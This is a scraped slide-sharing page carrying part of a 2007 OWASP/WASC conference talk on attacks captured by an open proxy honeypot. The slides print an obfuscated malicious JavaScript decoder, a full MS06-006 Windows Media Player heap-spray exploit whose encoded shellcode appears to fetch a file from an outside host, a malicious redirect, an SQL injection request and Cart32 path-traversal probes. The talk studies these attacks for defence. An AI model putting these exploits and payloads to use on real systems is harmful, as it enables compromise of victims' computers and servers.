KHKa. KUKn. Kg. KGKNK 4 KSKJKc. Kg. KGKNKc. KKKc. Kb. Kj. Kp. KJKc. Kg. KGKNK 3 K 3 KOKc. Kg. KY 7 VK 3 K 4 Kc. K 5 Kz 7 g. K 8 K 7 KM 7 WK 7 Ke. KUKn. KBKr. Ke. KFK 8 KHKYKa. KUKn. KBKr. Ke. KFK 8 KUKr. Kz. Kk. Ka. KIKn. KO 7 OK 5 Kz 7 g. K 8 KYKV Kz. K 5 Ke. KFKOKl. Kt. KOKJKc. KUKVKe. KMKUKz. Kc. Kg. KY 7 VKJKc. KZKK 7 KNKUKd. Kw. Ke. Ki%27%3 Bvar%20 n. U%3 DStri ng%28%29%3 Bfunction%20 KS%28 Pj%29%7 Breturn%20 parse. Int%28 Pj%29%7 Dzl%3 Dzl. split%28 ai%29%3 Bfo r%28 DS%3 D 0%3 BDS%3 CRk. length%3 BDS+%3 D 2%29%7 Bbq%3 DRk. substr%28 DS%2 C 2%29%3 Bfor%28 wc% 3 D 0%3 Bwc%3 Czl. length%3 Bwc++%29%7 Bif%28 zl%5 Bwc%5 D%3 D%3 Dbq%29 break%3 B%7 D%20 n. U+%3 DStr ing. from. Char. Code%28 PT%5 Bwc%5 D%5 E 157%29%3 B%7 Ddocument. write%28 n. U%29%3 B%7 D%0 Acatch%28 e %29%7 B%7 D%3 C/script%3 E"))</script><!--[/O]--> < OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Sandbox Testing the Javascript <I decided to test out executing the javascript to see" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-50.jpg" alt="Sandbox Testing the Javascript <I decided to test out executing the javascript to see" /> Sandbox Testing the Javascript <I decided to test out executing the javascript to see what it would do. <I used Sandboxie and Burp Proxy to intercept/manipulate/record the Javascript. <Here we go… OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Redirect to a new site GET /html/ HTTP/1. 1 Host: www. example. com. cee" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-51.jpg" alt="Redirect to a new site GET /html/ HTTP/1. 1 Host: www. example. com. cee" /> Redirect to a new site GET /html/ HTTP/1. 1 Host: www. example. com. cee 4 f 2730 c 07001 bdf 06 d 6 a 5. update 1. classictel. org User-Agent: Mozilla/5. 0 (Windows; U; Windows NT 5. 1; en-US; rv: 1. 8. 1. 7) Gecko/20070914 Firefox/2. 0. 0. 7 Accept: text/xml, application/xhtml+xml, text/html; q=0. 9, text/plai n; q=0. 8, image/png, */*; q=0. 5 Accept-Language: en-us, en; q=0. 5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859 -1, utf-8; q=0. 7, *; q=0. 7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http: //www. example. com/js. html HTTP/1. 1 302 Found Date: Mon, 08 Oct 2007 21: 28: 45 GMT Server: Apache/2. 2. 4 (Fedora) X-Powered-By: PHP/5. 1. 6 Location: http: //bibi 32. org/505/Xp/ Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="MS Windows Media Player 10 Plugin Overflow Exploit (MS 06 -006) <HTML><HEAD> <SCRIPT> function" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-52.jpg" alt="MS Windows Media Player 10 Plugin Overflow Exploit (MS 06 -006) <HTML><HEAD> <SCRIPT> function" /> MS Windows Media Player 10 Plugin Overflow Exploit (MS 06 -006) <HTML><HEAD> <SCRIPT> function getpayload() { return "%u 54 EB%u 758 B%u 8 B 3 C%u 3574%u 0378%u 56 F 5%u 768 B%u 0320%u 33 F 5%u 49 C 9%u. AD 41%u. DB 33% u 0 F 36%u 14 BE%u 3828%u 74 F 2%u. C 108%u 0 DCB%u. DA 03%u. EB 40%u 3 BEF%u 75 DF%u 5 EE 7%u 5 E 8 B%u 0 324%u 66 DD%u 0 C 8 B%u 8 B 4 B%u 1 C 5 E%u. DD 03%u 048 B%u 038 B%u. C 3 C 5%u 7275%u 6 D 6 C%u 6 E 6 F%u 642 E%u 6 C 6 C%u 4300%u 5 C 3 A%u 2 E 55%u 7865%u 0065%u. C 033%u 0364%u 3040%u 0 C 78%u 408 B%u 8 B 0 C% u 1 C 70%u 8 BAD%u 0840%u 09 EB%u 408 B%u 8 D 34%u 7 C 40%u 408 B%u 953 C%u 8 EBF%u 0 E 4 E%u. E 8 EC%u. F F 84%u. FFFF%u. EC 83%u 8304%u 242 C%u. FF 3 C%u 95 D 0%u. BF 50%u 1 A 36%u 702 F%u 6 FE 8%u. FFFF%u 8 BF F%u 2454%u 8 DFC%u. BA 52%u. DB 33%u 5353%u. EB 52%u 5324%u. D 0 FF%u. BF 5 D%u. FE 98%u 0 E 8 A%u 53 E 8% u. FFFF%u 83 FF%u 04 EC%u 2 C 83%u 6224%u. D 0 FF%u 7 EBF%u. E 2 D 8%u. E 873%u. FF 40%u. FFFF%u. FF 52%u. E 8 D 0%u. FFD 7%u. FFFF%u 7468%u 7074%u 2 F 3 A%u 622 F%u 6269%u 3369%u 2 E 32%u 726 F%u 2 F 67%u 303 5%u 2 F 35%u 7058%u 2 F 2 F%u 6966%u 656 C%u 702 E%u 7068"; } var s=unescape("%u 4141%u 4141%u 4141"); do {s+=s} while(s. length<0 x 0900000); WMV file extension s+=unescape(getpayload()); </SCRIPT> </HEAD><BODY><EMBED SRC="--------------------------------CUT-AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAA NNNNOOOOAAA QQQQRRRRSSSSTTT TUUUUVVVVWWWWXXXXYYYYZZZZ 0000111122223333444455556666777788889999. wmv"></E MBED></BODY></HTML> OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Cross-site Scripting (XSS) is an attack technique that forces a web site to echo" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-53.jpg" alt="Cross-site Scripting (XSS) is an attack technique that forces a web site to echo" /> Cross-site Scripting (XSS) is an attack technique that forces a web site to echo attacker-supplied executable code, which loads in a user's browser. <All inbound XSS alert messages were triggered by either 4 SPAMMERS sending their html posts to various message boards 4 Poor HTML that accidentally added javascript to links OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="SQL Injection is an attack technique used to exploit web sites that construct SQL" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-54.jpg" alt="SQL Injection is an attack technique used to exploit web sites that construct SQL" /> SQL Injection is an attack technique used to exploit web sites that construct SQL statements from usersupplied input. GET http: //www. example. com/app. aspx? pid=6246'%20 and %20 char(124)%2 Buser%2 Bchar(124)=0%20 and%20'%25'=' HTTP/1. 1 User-Agent: Internet Explorer 6. 0 Host: www. example. com Cookie: ASP. NET_Session. Id=zidkywu 4 rcfegi 554 fmc 3 c 2 q OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Cart 32 Get. Image Arbitrary File Download Exploit Attempt < Description: Cart 32 is" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-55.jpg" alt="Cart 32 Get. Image Arbitrary File Download Exploit Attempt < Description: Cart 32 is" /> Cart 32 Get. Image Arbitrary File Download Exploit Attempt < Description: Cart 32 is a web-based content manager. The application is exposed to an arbitrary file download issue because it fails to sufficiently sanitize user-supplied input to the "Image. Name" parameter of the "Get. Image" script. Cart 32 version 6. 3 is affected. < Ref: http: //www. securityfocus. com/bid/25928 < Exploit Example – 4 GET //cgi-bin/c 32 web. exe/Get. Image? Image. Name=Customer. Email. txt%00. pdf HTTP/1. 1 < The attacker sent similar probes for other common directory locations for the Cart 32 application – 4 //scripts/c 32 web. exe/Get. Image 4 //cgi/c 32 web. exe/Get. Image 4 //Cart 32/c 32 web. exe/Get. Image OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Information Leakage is when a web site reveals sensitive data, such as developer comments" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-56.jpg" alt="Information Leakage is when a web site reveals sensitive data, such as developer comments" /> Information Leakage is when a web site reveals sensitive data, such as developer comments or error messages, which may aid an attacker in exploiting the system. < As the previous section on SQL Injection showed, presenting verbose error messages to clients can not only provide attackers with information to aid in future attacks, but they can also be the actual transport for extracted information OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Example Detailed Error Message OWASP & WASC App. Sec 2007 Conference – San Jose" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-57.jpg" alt="Example Detailed Error Message OWASP & WASC App. Sec 2007 Conference – San Jose" /> Example Detailed Error Message OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Reveals Version Information OWASP & WASC App. Sec 2007 Conference – San Jose –" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-58.jpg" alt="Reveals Version Information OWASP & WASC App. Sec 2007 Conference – San Jose –" /> Reveals Version Information OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Insufficient Anti-Automation Insufficient Anti-automation is when a web site permits an attacker to automate" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-59.jpg" alt="Insufficient Anti-Automation Insufficient Anti-automation is when a web site permits an attacker to automate" /> Insufficient Anti-Automation Insufficient Anti-automation is when a web site permits an attacker to automate a process that should only be performed manually. Certain web site functionalities should be protected against automated attacks. <Account Registrations <Blog/Forum postings OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="The Poor-Man’s CAPTCHA Response Details HTTP/1. 1 401 Unauthorized WWW-Authenticate: Basic realm="Username : nospam" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-60.jpg" alt="The Poor-Man’s CAPTCHA Response Details HTTP/1. 1 401 Unauthorized WWW-Authenticate: Basic realm="Username : nospam" /> The Poor-Man’s CAPTCHA Response Details HTTP/1. 1 401 Unauthorized WWW-Authenticate: Basic realm="Username : nospam - Password : iamnotspam" Content-Length: 401 Content-Type: text/html; charset=iso-8859 -1 X-Cache: MISS from webgate X-Cache-Lookup: MISS from webgate: 80 Via: 1. 0 www. testproxy. net Notice: Subject to Monitoring Connection: close OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Lessons Learned (1) <Web attacks are running rampant 4 Automation 4 Attackers are extremely" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-61.jpg" alt="Lessons Learned (1) <Web attacks are running rampant 4 Automation 4 Attackers are extremely" /> Lessons Learned (1) <Web attacks are running rampant 4 Automation 4 Attackers are extremely bold, mainly due to their anonymity by hiding behind numerous open proxy servers <Application defects (server misconfigurations, cookie weaknesses, error messages) are a significant problem area <False Positives were high in some classes of attacks, however, that was mainly due to open proxy deployment and would not manifest itself in normal production environments OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="Lessons Learned (2) < As good as the identification/protection rules were, we still had" src="https://present5.com/presentation/ae56c32716b35ecb8e36d80d037f72f4/image-62.jpg" alt="Lessons Learned (2) < As good as the identification/protection rules were, we still had" /> Lessons Learned (2) < As good as the identification/protection rules were, we still had analysis challenges due to data overload 4 We need better/automated ways to categorize attacks 4 Even so, some activities are difficult to identify by looking at just one transaction 4 We need better correlation capabilities to identify anomalies and trends over time < Correlation of event data and full audit logging forensics is essential < If you would like to participate in the WASC Distributed Open Proxy Honeypot Project, please visit the website for more information – http: //www. webappsec. org/projects/honeypots/ < Questions? OWASP & WASC App. Sec 2007 Conference – San Jose – Nov 2007 </p> </div> <div style="width: auto;" class="description columns twelve"><p><img class="imgdescription" title="" src="" alt="" /> </p> </div> </div> <div id="inputform"> <script>$("#inputform").load("https://present5.com/wp-content/plugins/report-content/inc/report-form-aj.php"); </script> </div> </p> <!--end entry-content--> </div> </article><!-- .post --> </section><!-- #content --> <div class="three columns"> <div class="widget-entry"> <div id="sidebarrelated"> <div id="text-2" class="box_small box widget widget_text"><div class="crp_related crp_related_shortcode "><div class="gallery_entry_related"><a href="https://present5.com/project-work-dostizhenie-planiruemyx-rezultatov-fgos-noo/" ><img src="https://present5.com/wp-content/uploads/umk_perspektiva._okrughayuschiy_mir._avt_a.a._pleshakov_m.yu_.__novickaya._0-180x135.jpg" alt="Project work ДОСТИЖЕНИЕ ПЛАНИРУЕМЫХ РЕЗУЛЬТАТОВ ФГОС НОО" title="Project work ДОСТИЖЕНИЕ ПЛАНИРУЕМЫХ РЕЗУЛЬТАТОВ ФГОС НОО" width="180" height="135" class="crp_thumb crp_featured" /></a><a href="https://present5.com/project-work-dostizhenie-planiruemyx-rezultatov-fgos-noo/" class="crp_title">Project work ДОСТИЖЕНИЕ ПЛАНИРУЕМЫХ РЕЗУЛЬТАТОВ ФГОС НОО</a></div><div class="gallery_entry_related"><a href="https://present5.com/project-management-methodology-prof-sergey-bushuyev-putting/" ><img src="https://present5.com/wp-content/uploads/methodology_of_pm-180x135.jpg" alt="Project Management Methodology prof. Sergey Bushuyev Putting" title="Project Management Methodology prof. Sergey Bushuyev Putting" width="180" height="135" class="crp_thumb crp_featured" /></a><a href="https://present5.com/project-management-methodology-prof-sergey-bushuyev-putting/" class="crp_title">Project Management Methodology prof. Sergey Bushuyev Putting</a></div><div class="gallery_entry_related"><a href="https://present5.com/test-otkrytoe-pole-lab-fiziologii-i-genetiki-povedeniya/" ><img src="https://present5.com/wp-content/uploads/open-field2013bp-4-180x135.jpg" alt="Тест «открытое поле» Лаб. физиологии и генетики поведения," title="Тест «открытое поле» Лаб. физиологии и генетики поведения," width="180" height="135" class="crp_thumb crp_featured" /></a><a href="https://present5.com/test-otkrytoe-pole-lab-fiziologii-i-genetiki-povedeniya/" class="crp_title">Тест «открытое поле» Лаб. физиологии и генетики поведения,</a></div><div class="gallery_entry_related"><a href="https://present5.com/m-s-medicina/" ><img src="https://present5.com/wp-content/uploads/kөkіrekaralyқ_aurular_0-180x135.jpg" alt="м с Медицина" title="м с Медицина" width="180" height="135" class="crp_thumb crp_featured" /></a><a href="https://present5.com/m-s-medicina/" class="crp_title">м с Медицина</a></div><div class="gallery_entry_related"><a href="https://present5.com/the-world-leader-in-high-performance-signal-processing-solutions/" ><img src="https://present5.com/wp-content/uploads/dds_analog_devices-180x135.jpg" alt="The World Leader in High-Performance Signal Processing Solutions" title="The World Leader in High-Performance Signal Processing Solutions" width="180" height="135" class="crp_thumb crp_featured" /></a><a href="https://present5.com/the-world-leader-in-high-performance-signal-processing-solutions/" class="crp_title">The World Leader in High-Performance Signal Processing Solutions</a></div><div class="gallery_entry_related"><a href="https://present5.com/identifying-choroidal-neovascularization-using-fluorescein-angiography-and-complementary/" ><img src="https://present5.com/wp-content/uploads/fluorescein_angiography_0-180x135.jpg" alt="Identifying Choroidal Neovascularization Using Fluorescein Angiography and Complementary" title="Identifying Choroidal Neovascularization Using Fluorescein Angiography and Complementary" width="180" height="135" class="crp_thumb crp_featured" /></a><a href="https://present5.com/identifying-choroidal-neovascularization-using-fluorescein-angiography-and-complementary/" class="crp_title">Identifying Choroidal Neovascularization Using Fluorescein Angiography and Complementary</a></div><div class="gallery_entry_related"><a href="https://present5.com/predominantly-classic-cnv-treated-with-visudyne-therapy-tap/" ><img src="https://present5.com/wp-content/uploads/case_09_treated_predom_classic_cnv_tap_0-180x135.jpg" alt="Predominantly Classic CNV Treated with Visudyne Therapy TAP" title="Predominantly Classic CNV Treated with Visudyne Therapy TAP" width="180" height="135" class="crp_thumb crp_featured" /></a><a href="https://present5.com/predominantly-classic-cnv-treated-with-visudyne-therapy-tap/" class="crp_title">Predominantly Classic CNV Treated with Visudyne Therapy TAP</a></div><div class="gallery_entry_related"><a href="https://present5.com/eia-methods-methods-for-identifying-environmental-impacts/" ><img src="https://present5.com/wp-content/uploads/lecture_6_eia_methods-180x135.jpg" alt="EIA: methods Methods for identifying environmental impacts" title="EIA: methods Methods for identifying environmental impacts" width="180" height="135" class="crp_thumb crp_featured" /></a><a href="https://present5.com/eia-methods-methods-for-identifying-environmental-impacts/" class="crp_title">EIA: methods Methods for identifying environmental impacts</a></div><div class="crp_clear"></div></div></div></div> </div> </div> </div> </div> <!-- #content-wrapper --> <footer id="footer"> <div class="container"> <div class="columns twelve"> <!--noindex--> <!--LiveInternet counter--><script type="text/javascript"><!-- document.write("<img src='//counter.yadro.ru/hit?t26.10;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+ ";"+Math.random()+ "' alt='' title='"+" ' "+ "border='0' width='1' height='1'><\/a>") //--></script><!--/LiveInternet--> <script> $(window).load(function() { var owl = document.getElementsByClassName('owl-carousel owl-theme owl-loaded owl-drag')[0]; document.getElementById("owlheader").insertBefore(owl, null); $('#owlheader').css('display', 'inline-block'); }); </script> <script type="text/javascript"> var yaParams = {'typepage': '1000_top_300k', 'author': '1000_top_300k' }; </script> <!-- Yandex.Metrika counter --> <script type="text/javascript"> (function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter32395810 = new Ya.Metrika({ id:32395810, clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true, params: yaParams }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = "https://mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); </script> <noscript><div><img src="https://mc.yandex.ru/watch/32395810" style="position:absolute; left:-9999px;" alt="" /></div></noscript> <!-- /Yandex.Metrika counter --> <!--/noindex--> <nav id="top-nav"> <ul id="menu-top" class="top-menu clearfix"> </ul> </nav> </div> </div><!--.container--> </footer> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/present5.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://present5.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.4'></script> <script type='text/javascript' src='https://present5.com/wp-content/themes/sampression-lite/lib/js/jquery.shuffle.js?ver=4.9.16'></script> <script type='text/javascript' src='https://present5.com/wp-content/themes/sampression-lite/lib/js/scripts.js?ver=1.1'></script> <script type='text/javascript' src='https://present5.com/wp-content/themes/sampression-lite/lib/js/shuffle.js?ver=4.9.16'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://present5.com/wp-content/themes/sampression-lite/lib/js/selectivizr.js?ver=1.0.2'></script> <![endif]--> </body> </html>